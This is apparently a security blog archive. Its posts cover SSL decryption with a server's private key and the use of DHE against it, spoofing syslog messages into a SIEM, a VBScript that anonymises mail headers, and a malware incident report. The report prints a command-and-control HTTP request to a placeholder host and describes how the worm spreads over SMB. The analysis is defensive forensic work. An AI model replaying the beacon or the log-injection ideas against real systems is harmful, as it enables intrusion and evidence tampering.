The server can of course decrypt the pre_master_secret passed to it by the client (by using the server’s private key in testkey.pem), and subsequently both the client and the server derive the master_secret from it – this is the symmetric key that both parties will use with RC4 to encrypt the session.

But the server isn’t the only one with the private key that corresponds to the public key in the server’s certificate – Wireshark has it as well. This means it is able to decrypt the pre_master_secret on its way from the client to the server, and thereafter derive the master_secret needed to decrypt the traffic.

How to prevent decryption

There are at least two methods to approach this:

Method one – Protect the server’s private key

Protection of one’s private key is at the core of any system using asymmetric keys. If your private key is compromised, the attacker can either masquerade as you or they can attempt to carry out decryption as outlined above. Keys stored in separate files like the ones above are particularly vulnerable to theft if access permissions are not set strictly enough, or if some other vulnerability allows access. Certain operating systems like Windows and Cisco’s IOS will try to protect the keys on your behalf by marking them as “non-exportable”. This is meant to mean that the OS won’t divulge the private key to anyone under any circumstances, but clearly there comes a point where some software running on the box has to access the key in order to use it. This simple fact can sometimes be exploited to export non-exportable keys – a practical attack is described in a past edition of Hakin9 magazine. You can download it for free; here’s a quote from the article:

The Operating System (Windows XP in this case) does not let you export the private key of a certificate if it is marked as non-exportable. However, the OS must have access to read the private key in order to use it for signing and encrypting. If the OS can access the private key and we control the OS, then we can also access the private key.

Method two – Don’t use RSA for key exchange

As we’ve seen, the RSA key exchange is susceptible to interception if one is fortunate enough to have the server’s private key. By using a flavour of Diffie-Hellman for key exchange instead, we can rule out any chance of an attacker feasibly decrypting our SSL traffic even if they are in possession of the server’s private key. With your existing server certificates and keys, run the server like this and get your browser to fetch https://myserver/myfile.html again:

openssl s_server -key testkey.pem -cert testcert.pem -WWW -cipher AES256-SHA -accept 443

We’ve changed the cipher from RC4 to 256 bit AES – this step is just to prove that Wireshark can decrypt AES as well as RC4.

Now, to break the decryption, alter the cipher suite to use Diffie-Hellman instead of RSA for key exhcange:

openssl s_server -key testkey.pem -cert testcert.pem -WWW -cipher DHE-RSA-AES256-SHA -accept 443

If you’re using a browser other than IE (my IE8 doesn’t seem to support DH with RSA certificates), Wireshark is totally unable to decrypt the HTTP traffic, even though it is in possession of the server’s private key.

A DH key exchange is by design resistant to eavesdropping, although can be susceptible to a man-in-the-middle attack unless both parties identify themselves with certificates. It’s also, as we’ve seen, not universally supported by common SSL clients. But at least it rules out the possibility of some wiseguy with Wireshark sticking his fins where they’re not wanted!

Automatic inline SSL decryption

I have made some improvements to the viewssld package, which allows inline SSL decryption on your Snort/Sguil/etc boxes. You can read all about it here.

If you are interested in becoming an IT professional
you may want to consider a CCNA training course.


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Si(EM)lent Witness

Posted in General Security, Why watch the wire? on 23 June, 2010 by Alec Waters

Obligatory disclaimer: I Am Not A Lawyer. “Evidentiary weight” is probably something that involves a set of scales.

Evidence of an electronic crime is most commonly retrieved through a well-established process of computer forensics. Regardless of the actual examination techniques used, the evidence (a seized hard drive, for example) has to be handled in such a way that its integrity is preserved, usually by way of examining a forensic duplicate of the media and leaving the original in the evidence safe.

It’s a little different when practicing network forensics:

  • You have to be routinely collecting the evidence before the mischief is perpetrated. Network-based evidence is fleeting in nature – once it’s gone, it’s gone – if you’re not recording something all the time, when the mischief happens you’ll miss it.
  • There isn’t such a firm concept of “original” or “best” evidence as there is in the computer forensics world. Packet captures are a copy of the original traffic, collected syslog messages are copies of log messages from a device, and netflow exports are descriptions of an act rather than the act itself. None of the copies are “forensically sound” like a disk image can be considered to be; they all sound rather like second-hand accounts.

A handy thing to do with all this evidence is to collect it, usually with some kind of SIEM or Log Management device, and vendors of such devices go to lengths to preserve the integrity of the collected data to maximise its weight as evidence. For example, a Cisco CS-MARS box stores everything in an internal Oracle database to which the user has no direct access; the idea is to give some assurance that the collected logs haven’t been tampered with. Other vendors like AlienVault say that their product “Forensically store(s) data (admissible in court)”. Given the potentially second-hand nature of our evidence, these anti-tamper measures are surely a good thing.

However, how can we convince someone that the evidence we are presenting is a true and accurate account of a given event, especially in the case where there is little or no evidence from other sources? Perhaps a laptop’s hard drive has been shredded, and the only evidence we’ve got is from our SIEM/LM box. Our evidence may be considered unreliable, since:

  • It could be incomplete:
    • A packet capture may not have captured everything – dropped packets are commonplace.
    • UDP-based message transfer (syslog, netflow, SNMP trap, etc.) is best-effort delivery. Dropped messages will not be retransmitted, and most likely a gap in the sequence will not even be noticed.
    • We may have exceeded our SIEM’s events per second threshold, and the box itself may have discarded crucial evidence.
  • The body of evidence within our SIEM could have been tampered with.

But didn’t I say that vendors went to great lengths to prevent tampering? They do, but these measures only protect the information on the device already. What if I can contaminate the evidence before it’s under the SIEM’s protection?

The bulk of the information received by an SIEM box comes over UDP, so it’s reasonably easy to spoof a sender’s IP address; this is usually the sole means at the SIEM’s disposal to determine the origin of the message. Also, the messages themselves (syslog, SNMP trap, netflow, etc.) have very little provenance – there’s little or no sender authentication or integrity checking.

Both of these mean it’s comparatively straightforward for an attacker to send, for example, a syslog message that appears to have come from a legitimate server when it’s actually come from somewhere else.

In short, we can’t be certain where the messages came from or that their content is genuine.

So what could an attacker achieve by injecting false messages into an SIEM?

  • They could plant false evidence of an act that did not take place. Perhaps we want to get someone fired for downloading questionable materials, for example.
  • They could plant “tasty” evidence that the SIEM operators are likely to investigate first, buying the attacker time.
  • They could force the box over its EPS limit so that genuine evidence is discarded.
  • They could inject malformed messages that may lead the SIEM operators to believe that their box is somehow corrupted, and wait until it is offline for maintenance before striking.
  • They could inject events or series of events that “couldn’t happen” to cause the SIEM operators to distrust the accuracy of the system (e.g. a proxy log message indicating a fetch of a webpage with no corresponding netflow export).
  • Or perhaps their aim is to simply discredit the entire pool of evidence by injecting obviously false messages. Yes, an analyst could try to weed out the fake ones, but could they prove that they’d found all of them?
  • <insert your own creative evil here>

If there’s any doubt as to the provenance of a message received by the SIEM, one could always go back to the original source and look for it there. The problem here is that it might not be there any more (due to log rotation on a server) or there may not even be an original to compare it to (a netflow export is the original message, for example).

I’m surely being a bit pessimistic here, but given that there’s a distinct possibility that any given SIEM is chock full of lies, how much evidentiary weight does its content actually possess? Does anyone know of any successfully-prosecuted cases where evidence from an SIEM has been key?


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

hMailServer script to anonymise internal IP addresses

Posted in General Security, Information Leaks on 8 June, 2010 by Alec Waters

We all know that (accidentally) exposing private information to all and sundry is a bad thing; information leaked in SMTP Received: headers is a goldmine for pentesters and blackhats alike. Here’s a little script for hMailServer which will anonymise the names and IP addresses of internal SMTP mail clients that would otherwise be placed into a Received: header.

The script might need some tweaking to suit your environment:

  • It will anonymise Received: headers only when the connecting client’s IP address starts with 172.16. Alter this check to suit your own environment
  • You’ll need to change mail.example.com to whatever hMailServer’s Local host name is set to (under Settings->Protocols->SMTP->Delivery of e-mail)

hMailServer scripts are by default written in VBScript; I’ve had extensive counselling to get over the experience, and I’m fine now.

Tweak the script below, then add it to EventHandlers.vbs. Take care if you already have a handler defined for OnAcceptMessage:

‘ Strips out private IP addresses from Received header
‘ if the client’s IP address is in 172.16.0.0/16

Sub OnAcceptMessage(oClient, oMessage)

‘ Check client’s IP address – we only want to do this work
‘ for internal clients

If Left( oClient.IPAddress, 7 ) = “172.16.” Then

Dim oHeaders
set oHeaders = oMessage.Headers

‘ Iterate over the headers looking for Received:
Dim i
For i = oHeaders.Count -1 To 0 Step -1

Dim oHeader
Set oHeader = oHeaders.Item(i)

‘ Check if this is a header which we should modify.
If LCase(oHeader.Name) = “received” Then

‘ Log the header value in case we need it later on
EventLog.Write(“Pre-anonymisation: ” + oHeader.Value)

‘ Set up the regex
Dim myRegExp
Set myRegExp = New RegExp
myRegExp.Global = False
myRegExp.Pattern = “\bfrom[\-\sA-Za-z0-9\.\]\[\(\)]*by mail.example.com\b”

‘ Do the replacement
oHeader.Value = myRegExp.Replace( oHeader.Value, “from mailclient by mail.example.com” )

‘ Dump the modified header
EventLog.Write(“Post-anonymisation: ” + oHeader.Value)

End If

Next
‘ Save all the changes…
oMessage.Save

End If

End Sub

The before-and-after Received: headers look like this:

Received: from some-machine ([172.16.28.16]) by mail.example.com ; Tue, 8 Jun 2010 11:49:22 +0100
Received: from mailclient by mail.example.com ; Tue, 8 Jun 2010 11:49:22 +0100

…thereby neatly hiding the fact that there is an internal machine called some-machine at IP address 172.16.28.16. The original header is logged to hMailServer’s EventLog file in case it’s needed later on for debugging, or during Incident Response or other forensic activity.

You can download the script here – I hope someone finds it useful!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Private Investigations

Posted in Case Studies, General Security, Malware, NSM, Why watch the wire? on 25 May, 2010 by Alec Waters

The following is a sanitised excerpt from an after action report on a malware infection. Like the song this post is named after, the report goes all the way from “It’s a mystery to me” to “What have you got to take away?”. The report is in two parts:

  • Firstly, a timeline of events that was constructed from the various forms of log and network flow data that are routinely collected. Although not explicitly cited in this report, evidence exists to back up all of the items in the timeline
  • The second part is an analysis of the cause of all the mischief

To set the scene, the mystery to be unraveled concerned two machines on an enterprise network which reported that they had detected and removed malware. Detected and removed? Case closed, surely? Never ones to let a malware detection go uninvestigated, we dig deeper…

Part One – Timeline of events

Unknown time, likely shortly before 08:12:37 BST
Ian Oswald attaches a USB stick to his computer. $AV_VENDOR does nothing, either because it detects no threat or because it isn’t working properly. The last message from $AV_VENDOR on Ian’s machine to $AV_MANAGEMENT_SERVER was on 30th January 2009, suggesting the latter is the case.

Based upon subsequent activity, malware is active on Ian’s machine at this point, and is running under his Windows account as a Domain Administrator. The potential for mischief is therefore largely unconstrained.

08:12:37 BST
Ian’s machine ($ATTACKER) requests the URL:

http://www.whatismyip.com/automation/n09230945.asp

This returns a page containing the outside global IP address of Ian’s machine (i.e., the IP address it will appear to have when communicating with hosts on the Internet).

Something on Ian’s machine now knows “where it is” on the Internet.

It is likely that the inside local IP address of Ian’s machine (192.168.1.11) is also determined at this point, so something on Ian’s machine also knows “where it is” within the enterprise.

08:12:39 BST
Ian’s machine requests the URL:

http://geoloc.daigu­o.com/?self

This is a geolocation site, and returns the string containing a country code.

Something on Ian’s machine now knows “where it is” geographically.

08:12:56 BST
Ian’s machine attempts to download a hostile executable. This download is blocked by $URLFILTER, which is fortunate because at the time the executable was not detected as a threat by $AV_VENDOR.

NOTE – Subsequent analysis of the executable confirms its hostile nature; detailed discussion is out of the scope of this report, but a command and control channel was observed, and steganographic techniques were used to conceal the download of further malware by hiding an obfuscated executable in the Comments extension header of a gif file.

NOTE – It was not known until later in the investigation if Ian’s machine already knew where to download the executable from, or if a command and control channel was involved. Ian’s machine was running Skype at the time, which produces sufficient network noise to occlude such a channel when only network session information is available to the investigator.

After this attempted download, Ian’s machine starts trying to contact TCP ports 139 and 445 on IP addresses that are based on the determined outside global address of Ian’s machine (xxx.yyy.49.253).

TCP139 and TCP445 are used by the SMB protocol (Windows file sharing).

The scan starts with IP address xxx.yyy.49.1, and increments sequentially. As the day progresses, the scan of xxx.yyy.49.aaa finishes, and continues to scan xxx.yyy.50.aaa and xxx.yyy.51.aaa.

This is the behaviour of a worm. Something on Ian’s machine is trying to propagate to other machines nearby.

08:13:14 BST
Ian notices a process called ip.exe running in a command prompt window on his computer and he physically disconnects it from the network. This action was taken a very creditable 41 seconds after the first suspicious network activity.

Ian attempts to stop ip.exe running and remove it from his machine, and also deletes a file called gxcinr.exe from his USB stick.

08:24:51 BST
Ian reattaches his machine to the network.

08:25:36 BST
Ian uses Google to research ip.exe, and reads a blog posting which talks about its removal. Ian considers his machine clean at this point since the most obvious indicator (ip.exe) is no longer present.

08:57:32 BST
The external sequential SMB scanning observed before the attempted cleanup restarts at xxx.yyy.49.1.

Additionally, an internal scan commences at this point of the 192.168.1.aaa subnet (i.e., the enterprise’s internal network).

As the day progresses, the scan covers 192.168.2.aaa, 192.168.3.aaa, 192.168.4.aaa, 192.168.5.aaa, 192.168.6.aaa, 192.168.7.aaa and 192.168.8.aaa before Ian’s machine is switched off for the day. These latter subnets are not in use, so no connections were made to target systems.

The scan of 192.168.1.aaa is bound to bear fruit. Within this range, any detected SMB shares on enterprise computers will be accessed with the rights of a Domain Administrator.

8:58:43 BST
$AV_VENDOR detects and quarantines a threat named “W32/Autorun.worm.zf.gen” on $VICTIM_WORKSTATION_1 (Annie Timms’ machine). The threat was in a file called gxcinr.exe, which was in C:\Users\ on Annie’s machine. $AV_VENDOR cites $ATTACKER (Ian’s machine) as the threat source. This alert was propagated to the $SIEM via $AV_MANAGEMENT_SERVER, and the $SIEM sent an alert email to the security team.

9:00:08 BST
$AV_VENDOR detects and quarantines the same threat in the same file in the same location on $VICTIM_WORKSTATION_2. Linda Charles was determined to be the logged on user at the time, and again Ian’s machine was cited as the threat source. This alert was propagated to the $SIEM via $AV_MANAGEMENT_SERVER, and the $SIEM sent an alert email to the security team.

9:34:45 BST
$AV_VENDOR on $VICTIM_SERVER_1 detects the same threat in the same file, but in a different directory (C:\Program Files\Some software v1.1\). The threat was quarantined. No threat source was noted, although a successful type 3 (network) login from Ian.Oswald was noted immediately prior to the detection, making Ian’s machine the likely attacker. Unfortunately, the detection was _not_ propagated to $AV_MANAGEMENT_SERVER, and therefore did not find its way to the $SIEM to be sent as an email.

9:37:51 BST
The same threat was detected and quarantined on $VICTIM_SERVER_2, this time in E:\Testbeds\TestOne\. Again, a type 3 login from Ian.Oswald precedes the detection, which again was not propagated to $AV_MANAGEMENT_SERVER, $SIEM or email.

9:40:00 BST
The same threat appears on $VICTIM_SERVER_3, in C:\Program Files\SomeOtherSoftware. $AV_VENDOR does not detect the threat, because it isn’t fully installed on this machine.

NOTE – Detection of gxcinr.exe on this machine was by manual means, after the malware’s propagation mechanism was deduced (see next entry). $AV_VENDOR was subsequently installed on $VICTIM_SERVER_3 and a full scan performed. For what it’s worth, this did not detect any threats.

09:46:05 BST -> 09:54:44 BST
The border $IPS sensor detected Ian’s machine connecting to and enumerating SMB shares on three machines on $ISP’s network (i.e., other $ISP customers external to the enterprise).

This clue helps us see how the malware is spreading, and why the threats were detected in the cited directories.

The malware conducts a sequential scan of IP addresses, looking for open SMB ports. If it finds one, it enumerates the shares present, picks the first one only, and copies the threat (gxcinr.exe) to that location (i.e., \\VICTIMMACHINE\FirstShare\gxcinr.exe):

  • C:\Program Files\Some software v1.1\ equates to the first share on $VICTIM_SERVER_1 – \\$VICTIM_SERVER_1\Software
  • E:\Testbeds\TestOne\ equates to the first share on $VICTIM_SERVER_2 – \\$VICTIM_SERVER_2\TestOne
  • C:\Users equates to the first share on Annie’s and Linda’s machine – \\$VICTIM_WORKSTATION_1\Users and \\$VICTIM_WORKSTATION_2\Users
  • C:\Program Files\SomeOtherSoftware equates to the first share on $VICTIM_SERVER_3 – \\$VICTIM_SERVER_3\\SomeOtherSoftware

This knowledge allows us to manually check other machines on the enterprise network by performing the same steps as the malware. Other machines and devices were found to have open file shares, but either the shares were not writeable from a Domain Administrator’s account, or there was no trace of the threat (gxcinr.exe).

Circa 14:00 BST
Ian turns his machine off and leaves the office until the following Monday.

The following Monday
Ian returns to the office and wipes his machine, installing Windows 7 in place of the previous Windows Vista. “Patient Zero” is therefore gone forever, and any understanding we could have extracted from it is lost.

END OF TIMELINE

Part Two – Analysis of gxcinr.exe

It is necessary to understand what this file is, what it does, and how it persists in order to know if we have eradicated the threat. We also need to understand if gxcinr.exe was responsible for the propagation from Ian’s machine, or if it was just the payload.

Samples of gxcinr.exe were available in five places, namely the unprotected $VICTIM_SERVER_3 server and in the quarantine folders of the four machines where $AV_VENDOR detected the threat. We reverse-engineered the quarantine file format used by $AV_VENDOR and extracted the quarantined threats for comparison.

On $VICTIM_SERVER_3 machine, the MAC times for gxcinr.exe were as follows:

Modified: aa/bb/2009 09:13
Accessed: xx/yy/2010 09:40
Created: xx/yy/2010 09:40
No file attributes were set.

Additionally, a zero-byte file called khw was found alongside gxcinr.exe. Its MAC times correlate with those of gxcinr.exe, indicating that it was either propagated along with gxcinr.exe or created by it:

Modified: xx/yy/2010 09:40
Accessed: xx/yy/2010 09:40
Created: xx/yy/2010 09:40
Attributes: RHSA

khw was also found on Linda Charles’s machine, and removed manually. No other machines had khw on them.

All five samples of gxcinr.exe were found to be identical:

File size: 808164 bytes

Hashes:
MD5 : 2511bcae3bf729d2417635cb384e3c08
SHA1 : 45fe02e4489110723c2787f3975ae7122b905400
SHA256: b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3

VirusTotal report is here:

http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1272966302

The AV detection rate is pretty good, although we were the first people to submit this specific malware sample to VirusTotal for analysis (i.e., it’s a reasonably fresh variant of a malware strain).

Whilst it’s not a safe assumption to judge the nature of malware by AV vendors’ descriptions alone, most of the descriptions have AutoIt in their names. AutoIt is a scripting tool that can be used to produce executables to carry out Windows tasks. Analysis of ASCII and Unicode strings contained in the sample lends weight to this theory.

AutoIt has an executable-to-script feature, but this was unable to extract the compiled script. Research suggests that this feature has been removed from recent versions of the software as a security precaution.

The sample contains the string below, amongst many other intelligible artefacts:

“This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.”

The address above was emailed asking for help, but no response was received.

The next step was to carry out dynamic analysis of the sample (i.e., the executable was run in an instrumented and controlled environment and the results observed).

When run, gxcinr.exe did very little. There was no geolocation, no IP address determination, no instance of ip.exe, no scanning, and no second-stage download.

However, three temporary files were discovered which gxcinr.exe created and later attempted to remove:

  1. aut1F.tmp (random filename, judging by repeated runs) is binary, first four bytes is the ASCII string EA06 (http://www.virustotal.com/analisis/b3508b5a86ca4b9d972ce46dd4dcc1dcbe528a24190d2ed10a3cfcf8038c8ecd-1273577387). There is no obvious decode or deobfuscation.
  2. jbmphni (random filename, judging by repeated runs) is ASCII and starts off “3939i33t33i33t3135i33t…..”. There are many repeating patterns in the file, some of which are several tens of characters long (http://www.virustotal.com/analisis/0ad63912039550b5bdfd8a08ce5f49997ed1fced070df4d8e51cbffa500f102d-1273577394). Again, there is no obvious decode or deobfuscation.
  3. s.cmd is a cleanup script, run by gxcinr.exe after it itself has deleted the files above:

    :loop
    del “C:\gxcinr.exe”
    if exist “C:\gxcinr.exe” goto loop
    del c:\s.cmd

Running the sample in this manner yielded no obvious activity, infection, propagation or persistence.

However, if the file khw is present in the same directory as gxcinr.exe, different behaviour is observed. The three files above are extracted, the cleanup above is observed, but also:

  • A slightly modified version of the sample is copied to c:\windows\system32 as csrcs.exe. The name of the file is a deliberate attempt to hide in plain sight – there is a legitimate windows file called csrss.exe. Additionally, the file’s create and modified times are artificially set to match the date that Windows was installed. VirusTotal says this of csrcs.exe:
    http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1274359325
  • No attempt is made to hide csrcs.exe from detection, nor does it delete its prefetch file. No matching prefetch files were found on the machines belonging to Annie and Linda, so it is unlikely that the malware executed there. Prefetch is disabled by default on Windows Server 2003, so this kind of analysis cannot be performed on $VICTIM_SERVER_1, $VICTIM_SERVER_2, and $VICTIM_SERVER_3.
  • csrcs.exe is set to auto-run with each reboot by means of various registry keys.
  • csrcs.exe contacts a command and control server at IP address qqq.www.eee.rrr on varying ports in the 81-89 range. The request was HTTP, and looked like this:

    GET /xny.htm HTTP/1.1
    Host: http://www.hostile.com:85
    Cache-Control: no-cache

    The response is encoded somehow:

    HTTP/1.1 200 Ok
    Content-Length: 2811
    Last-modified: xxx, xx xxx 2010 11:13:30 GMT
    Content-Type: text/html
    Connection: Keep-Alive
    Server: SHS

    <zZ45sAsM8Y77V69S888S6 … snip … 80ew0kty0j4tyj004>

    There is no obvious decode of the response, but we are likely receiving instructions of some kind. Looking retrospectively at the evidence secured at the time, we can see Ian’s machine contacting this IP address:

    08:12:39.048 BST: %IPNAT-6-CREATED: tcp 192.168.1.11:50345 xxx.yyy.49.253:50345 qqq.www.eee.rrr:85 qqq.www.eee.rrr:85

    08:12:41 BST Cisco Netflow : bytes: 289 , packets: 5 , 192.168.1.11 /50345 -> qqq.www.eee.rrr /85 ­ TCP

    08:13:39.393 BST: %IPNAT-6-DELETED: tcp 192.168.1.11:50345 xxx.yyy.49.253:50345 qqq.www.eee.rrr:85 qqq.www.eee.rrr:85

    This C&C channel was not readily obvious due to the presence of Skype on Ian’s machine – there were too many other connections to random IP addresses on random ports for this to stand out.

    Despite the fact this suspected C&C channel uses unencrypted HTTP, only nominated ports are inspected via $URLFILTER (port 80 is inspected as the default, plus other ports where we have seen HTTP running in the past). At the time, 85 was not one of the nominated ports so no inspection of this traffic was carried out. Had port 85 been in the list, $URLFILTER would have blocked the request, as the destination is categorised as Malicious. It is unknown if this step would have prevented the worm from spreading, but it would have at least been another definite indicator of malice.

  • csrcs.exe then gets its external IP address and geolocation in the manner observed from Ian’s machine
  • csrcs.exe then starts scanning in the manner observed from Ian’s machine
  • csrcs.exe infects other machines in the manner observed from Ian’s machine

In our tests, csrcs.exe created a file on each remote victim machine called owadzw.exe, and put the file khw alongside it (suggesting that gxcinr.exe is a randomly generated filename). We did not observe any attempt to execute owadzw.exe, nor were any registry keys modified. The malware appears to spread, but seems to rely on manual execution when the remote file share is on a fixed disk.

However, if the file share that is accessed is removable media (USB stick, camera, MP3 player or whatever), an autorun.inf file is created that will execute the malware when the stick is inserted in another computer. It is likely therefore that Ian’s USB stick was infected in this manner, and the malware was unleashed on the enterprise by virtue of him plugging it in.

The VirusTotal result for owadzw.exe is similar to the results for gxcinr.exe and csrcs.exe, so they are all likely to be slight variations of one another:

http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1274356524

We did not observe csrcs.exe trying to download any other executables, as was the case with Ian’s machine, nor did we observe ip.exe running on an infected machine.

Aside from spreading, the purpose of the malware is unknown. However, it is persistent (i.e., it will run every time you start your machine) and it does appear to have a command and control facility. It is entirely possible that at some later date it will ask for instructions and be told to carry out some other kind of activity (spamming, DOS, etc.) or it may download additional components (keyloggers, for example).

Where do we stand?

We understand the malware’s behaviour, and know how to look for indicators of it running both in terms of network activity and residual traces on the infected host. At present there are none, so we appear to be clean.

What went right?

  • An incident was triggered by virtue of an explicit indicator of malice (the $AV_VENDOR alerts from Annie’s and Linda’s machines).
  • Where functioning properly, $AV_VENDOR prevented the spread of the malware.
  • $URLFILTER blocked a malicious download.
  • We were able to preserve and analyse sufficient evidence in total absence of Patient Zero (Ian’s machine) for us to understand how the malware spreads. This let us carry out a comprehensive search for any other, undetected, infections (like the one on $VICTIM_SERVER_3).
  • We were able to recover a sample of the malware and analyse it to the extent that we can say with a good degree of confidence that it was present on Ian’s USB stick, and was responsible for the whole incident (as opposed to merely being the payload for some other unknown malware that had been running on Ian’s machine for an unknown period of time).
  • We were able to sharpen our detection of the malware, now that we know how it behaves.

What went wrong?

  • The infection was not stopped at its point of entry (Ian’s machine), most likely because $AV_VENDOR wasn’t working properly.
  • The malware executed as a Domain Administrator, effectively unlimiting the damage it could have caused.
  • The malware spread outside of the enterprise and infected other machines.
  • The malware infected an enterprise machine unprotected by $AV_VENDOR.
  • $VICTIM_SERVER_1 and $VICTIM_SERVER_2 did not report their infection to $AV_MANAGEMENT_SERVER. These detections were only discovered as part of the evidence preservation process.
  • $URLFILTER did not block the C&C channel due to the way it was configured.
  • The $IPS didn’t fire any “scanner” signatures.
  • No statistical alarms were raised by the $SIEM.

What can be changed or done better?

  • A review of the state of the $AV_VENDOR deployment should be carried out. We need to know what the coverage is like, how well the updates are working, and why certain machines don’t report to $AV_MANAGEMENT_SERVER.
  • Some form of USB device control should be implemented.
  • People with Administrative rights on the enterprise network should have two accounts, one “Admin” account and one “Normal” account. The Normal account should be used day-to-day, with the Admin account used only where necessary. This would put a cap on the capability of any malware that is able to run.
  • Unnecessary fileshares should be removed. It was determined experimentally that if you share anything within any user profile on a Vista or Win7 machine, the entire c:\users\ directory gets shared. This was the case on Annie’s and Linda’s machines.
  • The presence of Skype doesn’t help when dealing with an incident like this.
  • If a tighter outbound port filtering policy was applied, then the command and control channel would have been blocked, as would the worm’s attempts to propagate outside of the enterprise.

END OF REPORT

The production of this report would not have been possible without the routine collection of evidence from everything-you-can-lay-your-hands-on – servers, routers, switches, AV servers, URL filters and IPS devices all contributed to the report (notable things that did not contribute to the report are Ian’s machine and his USB stick, since they were wiped before they could play a part).

Without these event sources, all we’d have had were two reports of removed malware. Hardly cause for alarm, surely….


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Follow

Get every new post delivered to your Inbox.

Join 28 other followers